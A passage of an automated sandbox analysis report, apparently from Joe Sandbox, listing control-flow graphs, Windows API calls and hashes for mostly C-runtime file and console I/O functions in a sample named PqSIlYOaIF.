                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00122B6A
                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00122B73
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00122B93
                                                                                                                                                                                  • CloseHandle.KERNEL32(0011E7ED), ref: 00122CE0
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00122D12
                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00122D19
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4237864984-0
                                                                                                                                                                                  • Opcode ID: 4086a53fac17b0678fd4006610a7b6872543420055b0eaec0b6757b37132eb0c
                                                                                                                                                                                  • Instruction ID: d1cfcd73d1a9ca4f18757b9e800a55da3585418b34fc0500585ded16cf8216b3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4086a53fac17b0678fd4006610a7b6872543420055b0eaec0b6757b37132eb0c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 02A15732A04168AFCF2D9F68EC52BAD7BF1AB07320F150159F811AF391DB359866CB51
                                                                                                                                                                                  Function 0011EDCC Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 443 11edcc-11eddc 444 11edf6-11edf8 443->444 445 11edde-11edf1 call 111b37 call 111b24 443->445 447 11f138-11f145 call 111b37 call 111b24 444->447 448 11edfe-11ee04 444->448 461 11f150 445->461 466 11f14b call 112249 447->466 448->447 451 11ee0a-11ee33 448->451 451->447 454 11ee39-11ee42 451->454 457 11ee44-11ee57 call 111b37 call 111b24 454->457 458 11ee5c-11ee5e 454->458 457->466 459 11f134-11f136 458->459 460 11ee64-11ee68 458->460 465 11f153-11f156 459->465 460->459 464 11ee6e-11ee72 460->464 461->465 464->457 469 11ee74-11ee8b 464->469 466->461 472 11eec0-11eec6 469->472 473 11ee8d-11ee90 469->473 474 11eec8-11eecf 472->474 475 11ee9a-11eeb1 call 111b37 call 111b24 call 112249 472->475 476 11ee92-11ee98 473->476 477 11eeb6-11eebe 473->477 479 11eed1 474->479 480 11eed3-11eef1 call 116f39 call 116eff * 2 474->480 509 11f06b 475->509 476->475 476->477 478 11ef33-11ef52 477->478 482 11ef58-11ef64 478->482 483 11f00e-11f017 call 12196f 478->483 479->480 513 11eef3-11ef09 call 111b24 call 111b37 480->513 514 11ef0e-11ef31 call 11ca94 480->514 482->483 486 11ef6a-11ef6c 482->486 497 11f019-11f02b 483->497 498 11f088 483->498 486->483 490 11ef72-11ef93 486->490 490->483 494 11ef95-11efab 490->494 494->483 500 11efad-11efaf 494->500 497->498 499 11f02d-11f03c GetConsoleMode 497->499 502 11f08c-11f0a2 ReadFile 498->502 499->498 504 11f03e-11f042 499->504 500->483 505 11efb1-11efd4 500->505 507 11f100-11f10b GetLastError 502->507 508 11f0a4-11f0aa 502->508 504->502 510 11f044-11f05c ReadConsoleW 504->510 505->483 512 11efd6-11efec 505->512 515 11f124-11f127 507->515 516 11f10d-11f11f call 111b24 call 111b37 507->516 508->507 517 11f0ac 508->517 511 11f06e-11f078 call 116eff 509->511 520 11f07d-11f086 510->520 521 11f05e GetLastError 510->521 511->465 512->483 525 11efee-11eff0 512->525 513->509 514->478 522 11f064-11f06a call 111b4a 515->522 523 11f12d-11f12f 515->523 516->509 519 11f0af-11f0c1 517->519 519->511 530 11f0c3-11f0c7 519->530 520->519 521->522 522->509 523->511 525->483 533 11eff2-11f009 525->533 536 11f0e0-11f0ed 530->536 537 11f0c9-11f0d9 call 11f1d5 530->537 533->483 542 11f0f9-11f0fe call 11f479 536->542 543 11f0ef call 11f157 536->543 548 11f0dc-11f0de 537->548 549 11f0f4-11f0f7 542->549 543->549 548->511 549->548
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0d3fb8ae8aca154d178f65d239e4cec354a964fd5ce69731b2686e8b0b25502f
                                                                                                                                                                                  • Instruction ID: 7f24016dfc4f22721b3ac1142a6c47cc1eaedc0faba70a6a83f5a9127b869516
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d3fb8ae8aca154d178f65d239e4cec354a964fd5ce69731b2686e8b0b25502f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48B1C074A04249AFDB19DF98D841BEEBBB1AF5A310F15417CF90197292D7709DC2CB60
                                                                                                                                                                                  Function 0011DA26 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 703 11da26-11da48 704 11dc3b 703->704 705 11da4e-11da50 703->705 706 11dc3d-11dc41 704->706 707 11da52-11da71 call 1123f2 705->707 708 11da7c-11da9f 705->708 714 11da74-11da77 707->714 709 11daa1-11daa3 708->709 710 11daa5-11daab 708->710 709->710 713 11daad-11dabe 709->713 710->707 710->713 715 11dad1-11dae1 call 11dd53 713->715 716 11dac0-11dace call 11cad4 713->716 714->706 721 11dae3-11dae9 715->721 722 11db2a-11db3c 715->722 716->715 725 11db12-11db28 call 11ddd0 721->725 726 11daeb-11daee 721->726 723 11db93-11dbb3 WriteFile 722->723 724 11db3e-11db44 722->724 727 11dbb5-11dbbb GetLastError 723->727 728 11dbbe 723->728 730 11db46-11db49 724->730 731 11db7f-11db8c call 11e1ff 724->731 743 11db0b-11db0d 725->743 732 11daf0-11daf3 726->732 733 11daf9-11db08 call 11e197 726->733 727->728 737 11dbc1-11dbcc 728->737 738 11db6b-11db7d call 11e3c3 730->738 739 11db4b-11db4e 730->739 742 11db91 731->742 732->733 740 11dbd3-11dbd6 732->740 733->743 744 11dc36-11dc39 737->744 745 11dbce-11dbd1 737->745 749 11db66-11db69 738->749 746 11dbd9-11dbdb 739->746 747 11db54-11db61 call 11e2da 739->747 740->746 742->749 743->737 744->706 745->740 750 11dc09-11dc15 746->750 751 11dbdd-11dbe2 746->751 747->749 749->743 754 11dc17-11dc1d 750->754 755 11dc1f-11dc31 750->755 756 11dbe4-11dbf6 751->756 757 11dbfb-11dc04 call 111bb0 751->757 754->704 754->755 755->714 756->714 757->714
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0011DDD0: GetConsoleOutputCP.KERNEL32(A2ACF9F7,00000000,00000000,?), ref: 0011DE33
                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00112AF0,?), ref: 0011DBAB
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00112AF0,?,00112D34,00000000,?,00000000,00112D34,?,?,?,001312B8,0000002C,00112C20,?), ref: 0011DBB5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2915228174-0
                                                                                                                                                                                  • Opcode ID: 9fbd5184e18f8d8bf7a68d9353b0d3549df292c7e38d3ac9fcbda7a93d64fe49
                                                                                                                                                                                  • Instruction ID: 847239b76033c6743b042160ea1e653e7aaa6bc7afde9f940af9a63f7d892688
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fbd5184e18f8d8bf7a68d9353b0d3549df292c7e38d3ac9fcbda7a93d64fe49
                                                                                                                                                                                  • Instruction Fuzzy Hash: F861E7B1D08119BFDF19CFA8E884EEE7BB9BF1A304F150169E801A7251D771D981CB94
                                                                                                                                                                                  Function 0011E1FF Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 760 11e1ff-11e254 call 10bf00 763 11e256 760->763 764 11e2c9-11e2d9 call 1091e8 760->764 766 11e25c 763->766 768 11e262-11e264 766->768 769 11e266-11e26b 768->769 770 11e27e-11e2a3 WriteFile 768->770 771 11e274-11e27c 769->771 772 11e26d-11e273 769->772 773 11e2c1-11e2c7 GetLastError 770->773 774 11e2a5-11e2b0 770->774 771->768 771->770 772->771 773->764 774->764 775 11e2b2-11e2bd 774->775 775->766 776 11e2bf 775->776 776->764
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,0011DB91,00000000,00112D34,?,00000000,?,00000000), ref: 0011E29B
                                                                                                                                                                                  • GetLastError.KERNEL32(?,0011DB91,00000000,00112D34,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00112AF0), ref: 0011E2C1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                  • Opcode ID: 1249ef1ecbe8392acdf2edd480f3e01b81bb44ab3b6057731948868d3de99d56
                                                                                                                                                                                  • Instruction ID: 6a319562f91e3b55ce19edd51e34b40d0b45dc744253756a17c6c9f31239269a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1249ef1ecbe8392acdf2edd480f3e01b81bb44ab3b6057731948868d3de99d56
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C219F31A002199BCF19CFA9DCA09E9B7F9EB5D301F2445AAED06D7215D730DE868F60
                                                                                                                                                                                  Function 001189E2 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 777 1189e2-1189e7 778 1189e9-118a01 777->778 779 118a03-118a07 778->779 780 118a0f-118a18 778->780 779->780 781 118a09-118a0d 779->781 782 118a2a 780->782 783 118a1a-118a1d 780->783 784 118a84-118a88 781->784 787 118a2c-118a39 GetStdHandle 782->787 785 118a26-118a28 783->785 786 118a1f-118a24 783->786 784->778 788 118a8e-118a91 784->788 785->787 786->787 789 118a66-118a78 787->789 790 118a3b-118a3d 787->790 789->784 791 118a7a-118a7d 789->791 790->789 792 118a3f-118a48 GetFileType 790->792 791->784 792->789 793 118a4a-118a53 792->793 794 118a55-118a59 793->794 795 118a5b-118a5e 793->795 794->784 795->784 796 118a60-118a64 795->796 796->784
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,001188D1,00131638,0000000C), ref: 00118A2E
                                                                                                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,001188D1,00131638,0000000C), ref: 00118A40
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                                                                  • Opcode ID: 1fd0a9ddbe6c9d5afc3468ced4f407069e09d9900a2a6a92245de4ecef8c1cd9
                                                                                                                                                                                  • Instruction ID: 4b98abf5c8fb2fa064c24cb314c2f1d66c97378998c425401cb8bd5009912b75
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fd0a9ddbe6c9d5afc3468ced4f407069e09d9900a2a6a92245de4ecef8c1cd9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 351103711147514BCB388E3EAC886A2BA95AF96334B39472FD0B6975F1CB30D9C6C250
                                                                                                                                                                                  Function 0011CC35 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 797 11cc35-11cc4d call 11d119 800 11cc63-11cc79 SetFilePointerEx 797->800 801 11cc4f-11cc56 797->801 803 11cc7b-11cc8c GetLastError call 111bb0 800->803 804 11cc8e-11cc98 800->804 802 11cc5d-11cc61 801->802 805 11ccb4-11ccb7 802->805 803->802 804->802 807 11cc9a-11ccaf 804->807 807->805
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000002,?,00000000,?,?,?,0011CAED,00000000,?,?,00000002,00000000), ref: 0011CC71
                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,0011CAED,00000000,?,?,00000002,00000000,?,0011DACB,?,00000000,00000000,00000002,?,?), ref: 0011CC7E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                  • Opcode ID: 05a82f039f420a55a0034706868f1c5662e75c337e6a2e21ca7970e81d3edd15
                                                                                                                                                                                  • Instruction ID: ad5683d01388f5ef265834be1fe166c6e9c4f0ea4805b19a70ec0c263d71e3a2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 05a82f039f420a55a0034706868f1c5662e75c337e6a2e21ca7970e81d3edd15
                                                                                                                                                                                  • Instruction Fuzzy Hash: CC012632604618AFCF098F68DC05EDE3B69EB85330F250258F8259B290E771EDD18BD0
                                                                                                                                                                                  Function 0011D596 Relevance: 2.6, APIs: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 809 11d596-11d5aa call 11d119 812 11d5b0-11d5b8 809->812 813 11d5ac-11d5ae 809->813 815 11d5c3-11d5c6 812->815 816 11d5ba-11d5c1 812->816 814 11d5fe-11d61e call 11d296 813->814 826 11d630 814->826 827 11d620-11d62e call 111bb0 814->827 817 11d5e4-11d5f4 call 11d119 CloseHandle 815->817 818 11d5c8-11d5cc 815->818 816->815 820 11d5ce-11d5e2 call 11d119 * 2 816->820 817->813 830 11d5f6-11d5fc GetLastError 817->830 818->817 818->820 820->813 820->817 828 11d632-11d635 826->828 827->828 830->814
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,0011D724,00000000,CF830579,00131778,0000000C,0011D6AC,001129A1,?), ref: 0011D5EC
                                                                                                                                                                                  • GetLastError.KERNEL32(?,0011D724,00000000,CF830579,00131778,0000000C,0011D6AC,001129A1,?), ref: 0011D5F6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                  • Opcode ID: faf000d91c7df57f614cc930a7911ab2d0621267bcd2b29607caee4147acadb7
                                                                                                                                                                                  • Instruction ID: 216f1ffa31a39643f504736c86cf87c97ec741f2b53aa2548f6dca362cc2eb95
                                                                                                                                                                                  • Opcode Fuzzy Hash: faf000d91c7df57f614cc930a7911ab2d0621267bcd2b29607caee4147acadb7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D110C325042202BD66D2674B846BFD77AB4B96738F250279F928872D2DB60D8C08551
                                                                                                                                                                                  Function 0011397B Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 834 11397b-113988 835 1139b2-1139c6 call 119960 834->835 836 11398a-1139ad call 1123f2 834->836 842 1139c8 835->842 843 1139cb-1139d4 call 11caf2 835->843 841 113b19-113b1b 836->841 842->843 845 1139d9-1139e8 843->845 846 1139f8-113a01 845->846 847 1139ea 845->847 850 113a03-113a10 846->850 851 113a15-113a49 846->851 848 1139f0-1139f2 847->848 849 113ac2-113ac7 847->849 848->846 848->849 852 113b17-113b18 849->852 853 113b15 850->853 854 113aa6-113ab2 851->854 855 113a4b-113a55 851->855 852->841 853->852 858 113ab4-113abb 854->858 859 113ac9-113acc 854->859 856 113a57-113a63 855->856 857 113a7c-113a88 855->857 856->857 861 113a65-113a77 call 113605 856->861 857->859 862 113a8a-113aa4 call 1135b4 857->862 858->849 860 113acf-113ad7 859->860 863 113b13 860->863 864 113ad9-113adf 860->864 861->852 862->860 863->853 867 113ae1-113af5 call 1137b0 864->867 868 113af7-113afb 864->868 867->852 872 113afd-113b0b call 120020 868->872 873 113b0e-113b10 868->873 872->873 873->863
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 009c49649f29840a080b60ff0ff30aa43f7535cff81c31dd5533c8760b58e4cc
                                                                                                                                                                                  • Instruction ID: b5ac575a113aac5c849609299b7108388e6b6cc6e21b90ad598d57baa893baeb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 009c49649f29840a080b60ff0ff30aa43f7535cff81c31dd5533c8760b58e4cc
                                                                                                                                                                                  • Instruction Fuzzy Hash: A551B270A00108AFDF19CF58D881EE97FB1EF59354F298168E8699B256D371DE81CB90
                                                                                                                                                                                  Function 0010A300 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 877 10a300-10a31a 878 10a323-10a32b 877->878 879 10a31c-10a31e 877->879 881 10a32d-10a337 878->881 882 10a34f-10a353 878->882 880 10a3fa-10a407 call 1091e8 879->880 881->882 888 10a339-10a34a 881->888 884 10a3f6 882->884 885 10a359-10a36a call 10abc3 882->885 889 10a3f9 884->889 893 10a372-10a3a6 885->893 894 10a36c-10a370 885->894 892 10a3f2-10a3f4 888->892 889->880 892->889 900 10a3a8-10a3ab 893->900 901 10a3c9-10a3d1 893->901 895 10a3b9 call 109e6d 894->895 899 10a3be-10a3c2 895->899 899->892 902 10a3c4-10a3c7 899->902 900->901 903 10a3ad-10a3b1 900->903 904 10a3d3-10a3e4 call 113c5d 901->904 905 10a3e6-10a3f0 901->905 902->892 903->884 906 10a3b3-10a3b6 903->906 904->884 904->905 905->884 905->892 906->895
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 82c1089bb4a2d5fc04a9c7b31c1c52fe34324ef1c058839343a93674e37de65c
                                                                                                                                                                                  • Instruction ID: f00fc540bfe9b559537234c4891102c22ef858e367a450cedbea022857ef0a5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 82c1089bb4a2d5fc04a9c7b31c1c52fe34324ef1c058839343a93674e37de65c
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA31663191021ADBCB14CF68C9509EEB7B9FF19310B944155E581EB6D0EB71FD44CB91
                                                                                                                                                                                  Function 0011E68F Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 909 11e68f-11e7d4 call 11e831 913 11e7d6-11e7e8 call 1229ab 909->913 914 11e82d-11e830 909->914 916 11e7ed-11e7f2 913->916 916->914 917 11e7f4-11e82c 916->917
                                                                                                                                                                                  APIs
